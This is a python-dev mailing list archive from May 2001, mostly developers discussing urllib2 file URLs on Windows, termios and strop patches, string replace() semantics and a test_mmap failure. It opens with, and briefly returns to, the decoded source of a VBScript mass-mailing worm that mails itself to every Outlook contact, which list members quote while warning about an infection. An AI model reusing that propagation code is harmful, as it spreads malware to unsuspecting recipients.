WS.Run("http://www2.sexcropolis.com/amateur/sheila/1.htm") ElseIf r=4 Then WS.Run("http://sheila.issexy.tv/1.htm") End If Function Mailit() On Error Resume Next Set Outlook = CreateObject("Outlook.Application") If Outlook = "Outlook" Then Set Mapi=Outlook.GetNameSpace("MAPI") Set Lists=Mapi.AddressLists For Each ListIndex In Lists If ListIndex.AddressEntries.Count <> 0 Then ContactCount = ListIndex.AddressEntries.Count For Count= 1 To ContactCount Set Mail = Outlook.CreateItem(0) Set Contact = ListIndex.AddressEntries(Count) Mail.To = Contact.Address Mail.Subject = "Homepage" Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've got to see this page! It's really cool ;O)"&vbcrlf&vbcrlf Set Attachment=Mail.Attachments Attachment.Add Folder & "\homepage.HTML.vb$" Mail.DeleteAfterSubmit = True If Mail.To <> "" Then Mail.Send WS.regwrite "HKCU\software\An\mailed", "1" End If Next End If Next End if End Function PS: the "decryption" was done in python ;) From tim.one at home.com Wed May 9 19:47:22 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 13:47:22 -0400 Subject: [Python-Dev] Homepage In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Greg Wilson's computer was infected by a virus which got propagated to > python-dev. Do NOT open the attachment! Note that the same virus went out under the name of John G. Michopoulos on the JPython (not Jython!) mailing list. Here's detailed info on the virus (incl. simple removal instructions if you got bit): http://www.symantec.com/avcenter/venc/data/vbs.vbswg2.d at mm.html Doesn't appear to be worse than a nuisance. Anyone who has used Windows Update within the last year and installed the "critical updates" it recommends should have gotten a popup box warning that the attachment was trying to access the Address Book, telling you it's probably a virus, and advising to accept the "No, don't allow this" default. you-can-make-it-foolproof-but-not-damnedfool-proof-ly y'rs - tim From Greg.Wilson at baltimore.com Wed May 9 20:50:25 2001 From: Greg.Wilson at baltimore.com (Greg Wilson) Date: Wed, 9 May 2001 14:50:25 -0400 Subject: [Python-Dev] apology Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B690@nsamcanms1.ca.baltimore.com> My apologies to all --- yes, my machine was hit by a virus that flooded the known universe with email. Sorry for any grief it has caused anyone, Greg From tim.one at home.com Wed May 9 21:30:41 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 15:30:41 -0400 Subject: [Python-Dev] test_urllib2 fails on Win98SE Message-ID: test_urliib2 takes > 30 seconds, then fails: C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py Traceback (most recent call last): File "../lib/test/test_urllib2.py", line 15, in ? f = urllib2.urlopen(file_url) File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen return _opener.open(url, data) File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open '_open', req) File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain result = func(*args) File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open return self.open_local_file(req) File "c:\code\python\dist\src\lib\urllib2.py", line 923, in open_local_file if not host or \ socket.error: host not found The URL it's passing is file://c:\code\python\dist\src\lib\urllib2.pyc If I change test_urllib2's file_url = "file://%s" % urllib2.__file__ to (adding another slash) file_url = "file:///%s" % urllib2.__file__ then it fails like this instead, but very quickly: C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py Traceback (most recent call last): File "../lib/test/test_urllib2.py", line 15, in ? f = urllib2.urlopen(file_url) File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen return _opener.open(url, data) File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open '_open', req) File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain result = func(*args) File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open return self.open_local_file(req) File "c:\code\python\dist\src\lib\urllib2.py", line 925, in open_local_file return addinfourl(open(url2pathname(file), 'rb'), IOError: [Errno 2] No such file or directory: '\\c:\\code\\python\\dist\\src\\lib\\urllib2.pyc' Here's what I know about URLs: . Here's what I know about file URLs: . Here's what I know about file URLs on Windows: . If I type the original file://c:\code\python\dist\src\lib\urllib2.pyc into IE's address bar, it actually *executes* urllib2. From mwh at python.net Wed May 9 21:50:34 2001 From: mwh at python.net (Michael Hudson) Date: 09 May 2001 20:50:34 +0100 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25 In-Reply-To: "Fred L. Drake"'s message of "Mon, 07 May 2001 10:55:37 -0700" References: Message-ID: "Fred L. Drake" writes: > ! fd = PyObject_AsFileDescriptor(obj); > ! if (fd == -1) { > ! if (PyInt_Check(obj)) { ^^^^^^^^^^^^^^^^ this is a bit pointless. I admit ->> termios.tcgetattr(-2) Traceback (most recent call last): File "", line 1, in ? TypeError: tcgetattr, arg 1: can't extract file descriptor from "int" is a bit confusing, but I'm not sure ->> termios.tcgetattr(-2) Traceback (most recent call last): File "", line 1, in ? error: (9, 'Bad file descriptor') is any better than: ->> termios.tcgetattr(-2) Traceback (most recent call last): File "", line 1, in ? ValueError: file descriptor cannot be a negative integer (-2) which is what you get after applying this patch: Index: Modules/termios.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Modules/termios.c,v retrieving revision 2.26 diff -c -r2.26 termios.c *** Modules/termios.c 2001/05/09 17:53:06 2.26 --- Modules/termios.c 2001/05/09 19:49:52 *************** *** 37,43 **** fd = PyObject_AsFileDescriptor(obj); if (fd == -1) { if (PyInt_Check(obj)) { ! fd = PyInt_AS_LONG(obj); } else { char* tname; --- 37,43 ---- fd = PyObject_AsFileDescriptor(obj); if (fd == -1) { if (PyInt_Check(obj)) { ! return 0; } else { char* tname; Cheers, M. From fdrake at acm.org Wed May 9 22:09:09 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Wed, 9 May 2001 16:09:09 -0400 (EDT) Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25 In-Reply-To: References: Message-ID: <15097.41957.820142.77750@cj42289-a.reston1.va.home.com> Michael Hudson writes: > this is a bit pointless. You're right! (Hey, it was your patch. ;) I'm checking in a different patch -- essentially, PyObject_AsFileDescriptor() does the right thing, and we don't ever need to second guess it. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From mwh at python.net Wed May 9 22:13:46 2001 From: mwh at python.net (Michael Hudson) Date: 09 May 2001 21:13:46 +0100 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 02 May 2001 21:55:25 +0200" References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > I've attached the patch. Due to a small reorganisation the patch is > a little longer -- symmetry has its price at C level too ;-) I may be being dense, but can you explain what's going on here: ->> u'\u00e3'.encode('latin-1') '\xe3' ->> u'\u00e3'.encode("latin-1").decode("latin-1") Traceback (most recent call last): File "", line 1, in ? UnicodeError: ASCII encoding error: ordinal not in range(128) Can you come up with some other example I can use it tomorrow's python-dev summary? Cheers, M. -- Remember - if all you have is an axe, every problem looks like hours of fun. -- Frossie -- http://home.xnet.com/~raven/Sysadmin/ASR.Quotes.html From mwh at python.net Wed May 9 22:18:47 2001 From: mwh at python.net (Michael Hudson) Date: 09 May 2001 21:18:47 +0100 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25 References: <15097.41957.820142.77750@cj42289-a.reston1.va.home.com> Message-ID: "Fred L. Drake, Jr." writes: > Michael Hudson writes: > > this is a bit pointless. > > You're right! (Hey, it was your patch. ;) So it was! I must have uploaded a slightly stale version of the patch, because I noticed this when cvs update conflicted with what I had in Modules/termios.c... oops. > I'm checking in a different patch -- essentially, > PyObject_AsFileDescriptor() does the right thing, and we don't ever > need to second guess it. I was a bit concerned that the error should contain the function name. On reflection, I agree that the code is so much simpler that it's a win. Cheers, M. -- Java sucks. [...] Java on TV set top boxes will suck so hard it might well inhale people from off their sofa until their heads get wedged in the card slots. --- Jon Rabone, ucam.chat From paulp at ActiveState.com Wed May 9 22:48:38 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Wed, 09 May 2001 13:48:38 -0700 Subject: [Python-Dev] test_urllib2 fails on Win98SE References: Message-ID: <3AF9AD26.AC6DD323@ActiveState.com> Tim Peters wrote: > >... > > Here's what I know about file URLs on Windows: . We constantly run into these problems with Komodo. The long and short is that file URL handling on Windows is totally different than on Unix and platform-specific code is probably appropriate. Here's what I know: IE treats the following equivalently: c:\temp\diff.txt file:c:\temp\diff.txt file:/c:\temp\diff.txt file://c:\temp\diff.txt file:///c:\temp\diff.txt file:///////////////////////////////c:\temp\diff.txt You can also reverse backslashes to slashes and slashes to backslashes if you like. Interestingly, though, UNC paths seem to work okay (no matter how you do the slashes and backslashes): file://americano\home\paulp\foo.html UNC paths seem to only allow two leading slashes/backslashes. Truly this is a new level of "be liberal in what you accept". The algorithm is probably something like: 1. normalize to forward slashes. 2. Remove "file:". 3. What you have left should be of the form: //machine/path or (/*)x:/path Where x is the drive letter. -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From fredrik at effbot.org Thu May 10 01:19:40 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Thu, 10 May 2001 01:19:40 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 References: Message-ID: <05e001c0d8de$87fcb9c0$e46940d5@hagrid> tim wrote: > Modified Files: > stropmodule.c > Log Message: > SF bug #422088: [OSF1 alpha] string.replace(). > Platform blew up on "123".replace("123", ""). Michael Hudson pinned the > blame on platform malloc(0) returning NULL. any reason why the #ifdef MALLOC_ZERO_RETURNS_NULL macro (in pyport.h) isn't set / doesn't take care of this? (and is it just me, or does the strop.replace function allocate a buffer, copy the result to that buffer, only to copy it into a string and throw the buffer away? no wonder u"".replace() is 30% faster than "".replace() ;-) Cheers /F From tim at digicool.com Thu May 10 01:39:08 2001 From: tim at digicool.com (Tim Peters) Date: Wed, 9 May 2001 19:39:08 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <05e001c0d8de$87fcb9c0$e46940d5@hagrid> Message-ID: [Fredrik Lundh] > any reason why the > > #ifdef MALLOC_ZERO_RETURNS_NULL > > macro (in pyport.h) isn't set / doesn't take care of this? The code uses PyMem_MALLOC, which after a chain of umpteen #defines ends up being plain malloc. As Michael noted in the bug report, it could have used PyMem_Malloc() instead and avoided the problem. But I chose not to do that, since special-casing a result of 0 was more efficient for reasons other than malloc. However: > (and is it just me, or does the strop.replace function allocate > a buffer, copy the result to that buffer, only to copy it into a > string and throw the buffer away? Yes. And I'm returning something now that musn't be free()'ed when the result length is 0. Will fix. > no wonder u"".replace() is 30% faster than "".replace() ;-) For a given number of characters or bytes ? From tim.one at home.com Thu May 10 01:46:13 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 19:46:13 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Message-ID: Oh, fuck. Somebody remind me why we have both stropmodule.c and stringobject.c? These bugs exist in both. From mike.mellor at tbe.com Thu May 10 02:16:28 2001 From: mike.mellor at tbe.com (mike.mellor at tbe.com) Date: Thu, 10 May 2001 00:16:28 -0000 Subject: [Python-Dev] CygWin and Tkinter Message-ID: <9dcmks+6aqf@eGroups.com> I am playing around with CygWin (which came with Pyhton 2.1 installed). While I can run command line programs, Tkinter is not part of the package. TCL/TK is installed and I have been able to build TK GUI's. How can I get Tkinter added to my Python package? Thanks. Mike From tim.one at home.com Thu May 10 02:47:52 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 20:47:52 -0400 Subject: [Python-Dev] Inconsistent string.replace() behavior Message-ID: test_strop.py contains this line: test('replace', 'one!two!three!', 'one at two@three@', '!', '@', 0) string_tests.py has this: test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0) IOW, the test suite insists that strop.replace('one!two!three!', '!', '@', 0) replace all matches but that string.replace('one!two!three!', '!', '@', 0) and 'one!two!three!'.replace('!', '@', 0) replace nothing. I've been thrashing like a madman trying to fix a common bug in both modules (in out-of-synch copies of mymemreplace), and every time I think I fix something "the other" module breaks. The above appears to be why. My opinion: the test_strop.py test is in error, and so was strop_replace() in stropmodule.c. I'm checking in changes accordingly, but won't mind getting yelled at if you disagree. From greg at cosc.canterbury.ac.nz Thu May 10 02:56:12 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 10 May 2001 12:56:12 +1200 (NZST) Subject: [Python-Dev] gcc barfs on recent stringobject changes... In-Reply-To: Message-ID: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz> Tim Peters : > PyObject *t = (PyObject *)op; > PyString_InternInPlace(&t); If you want to keep it all on one line, you could try PyString_InternInPlace((PyObject **)&op); Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From guido at digicool.com Thu May 10 04:00:36 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:00:36 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Your message of "Wed, 09 May 2001 19:46:13 -0400." References: Message-ID: <200105100200.VAA00411@cj20424-a.reston1.va.home.com> > Oh, fuck. Somebody remind me why we have both stropmodule.c and > stringobject.c? These bugs exist in both. In my mind, strop is obsolete. We keep it around because some losers like to import it directly, but it's basically dead, and except for a few functions, string.py doesn't use it any more. (The exceptions are maketrans, lowercase, uppercase, whitespace.) --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Thu May 10 04:01:20 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:01:20 -0500 Subject: [Python-Dev] CygWin and Tkinter In-Reply-To: Your message of "Thu, 10 May 2001 00:16:28 GMT." <9dcmks+6aqf@eGroups.com> References: <9dcmks+6aqf@eGroups.com> Message-ID: <200105100201.VAA00435@cj20424-a.reston1.va.home.com> > I am playing around with CygWin (which came with Pyhton 2.1 > installed). While I can run command line programs, Tkinter is not > part of the package. TCL/TK is installed and I have been able to > build TK GUI's. How can I get Tkinter added to my Python package? > Thanks. Beats me. Ask whoever produces the CygWin port. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Thu May 10 03:07:40 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 21:07:40 -0400 Subject: [Python-Dev] gcc barfs on recent stringobject changes... In-Reply-To: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz> Message-ID: >> PyObject *t = (PyObject *)op; >> PyString_InternInPlace(&t); [Greg Ewing] > If you want to keep it all on one line, you could try > > PyString_InternInPlace((PyObject **)&op); op is declared "register" so it's not strictly legal to apply the address-of operator to it regardless. Besides, Guido pays me by the line . or-maybe-by-the-useless-checkin-to-judge-from-the-last-24-hours-ly y'rs - tim From gward at python.net Thu May 10 03:08:58 2001 From: gward at python.net (Greg Ward) Date: Wed, 9 May 2001 21:08:58 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:00:36PM -0500 References: <200105100200.VAA00411@cj20424-a.reston1.va.home.com> Message-ID: <20010509210858.A3467@gerg.ca> On 09 May 2001, Guido van Rossum said: > In my mind, strop is obsolete. We keep it around because some losers > like to import it directly, but it's basically dead, and except for a > few functions, string.py doesn't use it any more. (The exceptions are > maketrans, lowercase, uppercase, whitespace.) Perhaps 2.2 should deprecate direct use of strop noisily -- warn when imported, except when imported by string.py. (No idea how you'd implement that, I'm just spouting off.) Then it could go away in 2.3. I don't think there's anything particularly controversial about 'strop' going away after one release with a deprecation warning -- it's not 'string', after all! (Ie. imported by every single scrap of Python code ever written before string methods came along, and by quite a lot since then.) Greg -- Greg Ward - nerd gward at python.net http://starship.python.net/~gward/ I joined scientology at a garage sale!! From guido at digicool.com Thu May 10 04:12:55 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:12:55 -0500 Subject: [Python-Dev] Inconsistent string.replace() behavior In-Reply-To: Your message of "Wed, 09 May 2001 20:47:52 -0400." References: Message-ID: <200105100212.VAA00491@cj20424-a.reston1.va.home.com> > test_strop.py contains this line: > > test('replace', 'one!two!three!', 'one at two@three@', '!', '@', 0) > > string_tests.py has this: > > test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0) > > IOW, the test suite insists that > > strop.replace('one!two!three!', '!', '@', 0) > > replace all matches but that > > string.replace('one!two!three!', '!', '@', 0) > and > 'one!two!three!'.replace('!', '@', 0) > > replace nothing. > > I've been thrashing like a madman trying to fix a common bug in both modules > (in out-of-synch copies of mymemreplace), and every time I think I fix > something "the other" module breaks. The above appears to be why. > > My opinion: the test_strop.py test is in error, and so was strop_replace() > in stropmodule.c. I'm checking in changes accordingly, but won't mind > getting yelled at if you disagree. HMMMMMM! In Python 1.5, a count of zero always replaces all occurrences, both using string and using strop. In 2.0 and later, strop's replace(..., 0) still replaces all, but string's replaces none. The replace() method of strings and unicode objects agrees with string.py. I think this change was made in the sake of ease of documenting the behavior: special-casing the count of zero is unexpected. I very vaguely recall that it was discussed on this list. So this suggests that test_string is correct, and string.replace() (and the methods) shouldn't be "fixed"! But since we're not really supporting strop any more, I think that strop shouldn't be changed either. So we'll have to live with the difference -- sorry! --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Thu May 10 03:13:20 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 21:13:20 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > In my mind, strop is obsolete. We keep it around because some losers > like to import it directly, but it's basically dead, and except for a > few functions, string.py doesn't use it any more. (The exceptions are > maketrans, lowercase, uppercase, whitespace.) So if Fred changes the docs to say it's obsolete, maybe we can actually rip out the buggy and redundant code it contains in about 2 years . cheeredly y'rs - tim From guido at digicool.com Thu May 10 04:25:43 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:25:43 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Your message of "Wed, 09 May 2001 21:08:58 -0400." <20010509210858.A3467@gerg.ca> References: <200105100200.VAA00411@cj20424-a.reston1.va.home.com> <20010509210858.A3467@gerg.ca> Message-ID: <200105100225.VAA00592@cj20424-a.reston1.va.home.com> > Perhaps 2.2 should deprecate direct use of strop noisily -- warn when > imported, except when imported by string.py. (No idea how you'd > implement that, I'm just spouting off.) Then it could go away in 2.3. I have had the necessary mods sitting in my directory for months (it was one of my first tests for using the warnings module), but decided against checking it in because I found there's quite a bit of code that triggered the warnings. Maybe I should check it in into 2.2a0, so developers can get used to it. > I don't think there's anything particularly controversial about 'strop' > going away after one release with a deprecation warning -- it's not > 'string', after all! (Ie. imported by every single scrap of Python code > ever written before string methods came along, and by quite a lot since > then.) Agreed. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Thu May 10 04:27:23 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:27:23 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Your message of "Wed, 09 May 2001 21:13:20 -0400." References: Message-ID: <200105100227.VAA00607@cj20424-a.reston1.va.home.com> > [Guido] > > In my mind, strop is obsolete. We keep it around because some losers > > like to import it directly, but it's basically dead, and except for a > > few functions, string.py doesn't use it any more. (The exceptions are > > maketrans, lowercase, uppercase, whitespace.) > > So if Fred changes the docs to say it's obsolete, maybe we can actually rip > out the buggy and redundant code it contains in about 2 years . Yes, but in the mean time the fact that it's buggy doesn't bother me at all. Let it be as buggy as it always was -- that's one more reason to stop using it! :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Thu May 10 03:33:52 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 21:33:52 -0400 Subject: [Python-Dev] Inconsistent string.replace() behavior In-Reply-To: <200105100212.VAA00491@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > HMMMMMM! In Python 1.5, a count of zero always replaces all > occurrences, both using string and using strop. In 2.0 and later, > strop's replace(..., 0) still replaces all, but string's replaces > none. The replace() method of strings and unicode objects agrees with > string.py. > > I think this change was made in the sake of ease of documenting the > behavior: special-casing the count of zero is unexpected. Yes, -1 == infinity is much clearer . > I very vaguely recall that it was discussed on this list. > > So this suggests that test_string is correct, and string.replace() > (and the methods) shouldn't be "fixed"! I didn't change their behavior wrt replace()'s interpretation of count, but to repair an unrelated bug (bogus MemoryError for an empty-string *result*) that happened to appear in both copies of mymemreplace sitting in the code base (one in stringobject.c, another but out-of-synch one in stropmodule.c). That's how stropmodule got sucked into this: to fix the gross null-string result bug common to both. > But since we're not really supporting strop any more, I think that > strop shouldn't be changed either. So we'll have to live with the > difference -- sorry! OK, I've restored the 0 == infinity semantics to strop.replace() and test_strop.py, but have not backed out the null-string result fix, nor the pain to make the mymemreplace clones identical again. From tim.one at home.com Thu May 10 04:00:30 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 22:00:30 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Yes, but in the mean time the fact that it's buggy doesn't bother me > at all. Let it be as buggy as it always was -- that's one more reason > to stop using it! :-) I think that's unsustainable in this specific case: stringobject and stropmodule contained several utility functions with the same names that clearly started life as identical code. Over time they got out of synch, and when they punched me in the face today, I had no idea which was "right" and which "wrong". Turned out they both had the same bug, and the clearest way to fix it in stringobject.c without leaving a more inconsistent x-module mess was to bring the once-common utility routines back into synch. As /F said, though, the mymemreplace() approach is inefficient and "should be" replaced wholesale. If that's done in stringobject.c alone, great, then I won't care about the legacy routines in stropmodule.c either. What I can't abide is having one copy of a function in the codebase work and a clone of it not work -- unless you can keep the undocumented history of both in your mind at all times, you're just as likely to bump into the broken one first when searching the code base, and if you're unlucky never even realize it is "the broken one" (or, if you're lucky, bump into the good one too, and then pee away time trying to understand the differences). i-have-garbage-in-my-kitchen-too-but-i-put-it-in-a-bag-so-i-don't- eat-it-by-mistake-ly y'rs - tim From Jason.Tishler at dothill.com Thu May 10 04:06:15 2001 From: Jason.Tishler at dothill.com (Jason Tishler) Date: Wed, 9 May 2001 22:06:15 -0400 Subject: [Python-Dev] CygWin and Tkinter In-Reply-To: <200105100201.VAA00435@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:01:20PM -0500 References: <9dcmks+6aqf@eGroups.com> <200105100201.VAA00435@cj20424-a.reston1.va.home.com> Message-ID: <20010509220615.A1928@dothill.com> Mike, On Wed, May 09, 2001 at 09:01:20PM -0500, Guido van Rossum wrote: > > I am playing around with CygWin (which came with Pyhton 2.1 > > installed). While I can run command line programs, Tkinter is not > > part of the package. TCL/TK is installed and I have been able to > > build TK GUI's. How can I get Tkinter added to my Python package? > > Thanks. > > Beats me. Ask whoever produces the CygWin port. I am the Cygwin Python maintainer. Please see the following for my views on adding Tkinter support to Cygwin Python: http://sources.redhat.com/ml/cygwin/2001-04/msg01842.html If Tkinter support is important to you, then please submit the appropriate patches for consideration to the Python Patch Manager on SourceForge. Norman Vine has built a Cygwin Python that supports Tkinter. See the following for his build procedure: http://www.vso.cape.com/~nhv/files/python/ Perhaps you would like to collaborate with Norman on this effort? Thanks, Jason -- Jason Tishler Director, Software Engineering Phone: +1 (732) 264-8770 x235 Dot Hill Systems Corp. Fax: +1 (732) 264-8798 82 Bethany Road, Suite 7 Email: Jason.Tishler at dothill.com Hazlet, NJ 07730 USA WWW: http://www.dothill.com From tim.one at home.com Thu May 10 04:54:45 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 22:54:45 -0400 Subject: [Python-Dev] test_mmap failing? Message-ID: I checked in a change to mmapmodule.c earlier today, to close a patch complaining about unused vrbl warnings. Here's the changed routine before ("value" is unused): mmap_read_byte_method(mmap_object *self, PyObject *args) { char value; char *where; CHECK_VALID(NULL); if (!PyArg_ParseTuple(args, ":read_byte")) return NULL; if (self->pos < self->size) { where = self->data + self->pos; value = (char) *(where); self->pos += 1; return Py_BuildValue("c", (char) *(where)); } else { PyErr_SetString (PyExc_ValueError, "read byte out of range"); return NULL; } } and after: mmap_read_byte_method(mmap_object *self, PyObject *args) { CHECK_VALID(NULL); if (!PyArg_ParseTuple(args, ":read_byte")) return NULL; if (self->pos < self->size) { char value = self->data[self->pos]; self->pos += 1; return Py_BuildValue("c", value); } else { PyErr_SetString (PyExc_ValueError, "read byte out of range"); return NULL; } } I'll be damned if I can see any semantic difference, and test_mmap worked fine on Windows after the change. But Fred reported: """ the fix introduced breakage on Linux (kernel 2.2.17): cj42289-a(.../python/linux-beowolf); ./python ../Lib/test/regrtest.py -v test_mmap test_mmap test_mmap test test_mmap crashed -- exceptions.IOError: [Errno 22] Invalid argument Traceback (most recent call last): File "../Lib/test/regrtest.py", line 246, in runtest __import__(test, globals(), locals(), []) File "../Lib/test/test_mmap.py", line 124, in ? test_both() File "../Lib/test/test_mmap.py", line 14, in test_both f.write('\0'* PAGESIZE) IOError: [Errno 22] Invalid argument 1 test failed: test_mmap """ However, at the point that's failing, test_mmap hasn't even *created* an mmap'ed file yet, let alone tried to read from it. The only thing test_mmap did so far is (the first comment is bogus -- that's the builtin Python open() function): # Create an mmap'ed file # THIS IS A BOGUS COMMENT f = open('foo', 'w+') # Write 2 pages worth of data to the file f.write('\0'* PAGESIZE) # THIS IS THE LINE IT'S DYING ON But having suffered too many "impossible problems" the last 36 hours, my confidence is shot <0.93 wink>. Is test_mmap failing for anyone else under current CVS? Fred, are you *sure* it fails for you -- if so, does the problem actually go away if you revert mmapmodule.c? looking-for-sense-in-all-the-wrong-places-ly y'rs - tim From jeremy at digicool.com Thu May 10 05:17:34 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Wed, 9 May 2001 23:17:34 -0400 (EDT) Subject: [Python-Dev] test_mmap failing? In-Reply-To: References: Message-ID: <15098.2126.368714.159135@slothrop.digicool.com> The latest CVS build works on my Linux 2.2.12 system. No problem with test_mmap. But test_pty does fail with some complaints about FCNTL, which Fred just removed. Maybe Fred is working in an alternate universe where test_mmap and test_pty are swapped. Jeremy From barry at digicool.com Thu May 10 06:08:42 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Thu, 10 May 2001 00:08:42 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 References: Message-ID: <15098.5194.677531.35326@anthem.wooz.org> >>>>> "TP" == Tim Peters writes: TP> Oh, fuck. Somebody remind me why we have both stropmodule.c TP> and stringobject.c? These bugs exist in both. IIRC, I once proposed to share code bases through elaborate #includes and exported functions, but that never went very far. Guido's already pronounced on this, and I'd say good riddance to strop. >>>>> "GvR" == Guido van Rossum writes: GvR> Yes, but in the mean time the fact that it's buggy doesn't GvR> bother me at all. Let it be as buggy as it always was -- GvR> that's one more reason to stop using it! :-) -----------------------------------^^^^ For a minute there, I thought you said "to strop using it". :) -Barry From fredrik at pythonware.com Thu May 10 08:22:53 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Thu, 10 May 2001 08:22:53 +0200 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 References: Message-ID: <004001c0d919$a62de7d0$e46940d5@hagrid> Tim Peters wrote: > I think that's unsustainable in this specific case: stringobject and > stropmodule contained several utility functions with the same names that > clearly started life as identical code. Over time they got out of synch, and > when they punched me in the face today, I had no idea which was "right" and > which "wrong". Turned out they both had the same bug, and the clearest way > to fix it in stringobject.c without leaving a more inconsistent x-module mess > was to bring the once-common utility routines back into synch. > > As /F said, though, the mymemreplace() approach is inefficient and "should > be" replaced wholesale. If that's done in stringobject.c alone, great, then > I won't care about the legacy routines in stropmodule.c either. as a footnote, SRE uses the same source code to generate both 8-bit and 16-bit versions of the match engine. I see no reason why we cannot do the same for the string operations (PyString, PyUnicode, and strop). if anyone wants me to look into this, just say "go ahead". > > no wonder u"".replace() is 30% faster than "".replace() ;-) > > For a given number of characters or bytes ? characters. judging from the SRE benchmarks, modern platforms can process 16-bit characters as fast as they can process 8-bit characters. Cheers /F From thomas at xs4all.net Thu May 10 11:31:38 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Thu, 10 May 2001 11:31:38 +0200 Subject: [Python-Dev] Homepage In-Reply-To: <200105091712.TAA05172@core.inf.ethz.ch>; from pedroni@inf.ethz.ch on Wed, May 09, 2001 at 07:12:20PM +0200 References: <200105091712.TAA05172@core.inf.ethz.ch> Message-ID: <20010510113138.K16486@xs4all.nl> On Wed, May 09, 2001 at 07:12:20PM +0200, Samuele Pedroni wrote: > Set s=CreateObject("Outlook.Application") > Set t=s.GetNameSpace("MAPI") > Set u=t.GetDefaultFolder(6) [..] > Set u=t.GetDefaultFolder(3) I know it's off-topic, 